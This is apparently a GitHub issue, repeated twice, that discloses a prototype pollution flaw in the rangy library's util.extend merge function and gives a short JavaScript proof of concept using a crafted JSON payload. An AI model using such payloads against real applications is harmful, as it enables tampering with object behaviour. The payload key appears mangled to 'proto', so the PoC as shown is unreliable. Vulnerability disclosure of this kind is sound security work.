Affected versions of this package are vulnerable to Prototype Pollution. Rangy runs the risk of Prototype Pollution when using the function extend in file rangy-core.js.The function use recursive mergelead an attacker to modify properties of the Object.prototype.the risk locate is in here:
and the POC is as follow:
var rangy= require("rangy")
BAD_JSON = JSON.parse('{"proto":{"test":123}}');
console.log({}.test) //undefined
rangy.util.extend({},BAD_JSON,{})
console.log({}.test) //"123"
The text was updated successfully, but these errors were encountered:
Affected versions of this package are vulnerable to Prototype Pollution. Rangy runs the risk of Prototype Pollution when using the function extend in file rangy-core.js.The function use recursive mergelead an attacker to modify properties of the Object.prototype.the risk locate is in here:
rangy/lib/rangy-core.js
Line 167 in 8aea7eb
rangy/lib/rangy-core.js
Line 165 in 8aea7eb
and the POC is as follow:
var rangy= require("rangy")
BAD_JSON = JSON.parse('{"proto":{"test":123}}');
console.log({}.test) //undefined
rangy.util.extend({},BAD_JSON,{})
console.log({}.test) //"123"
The text was updated successfully, but these errors were encountered: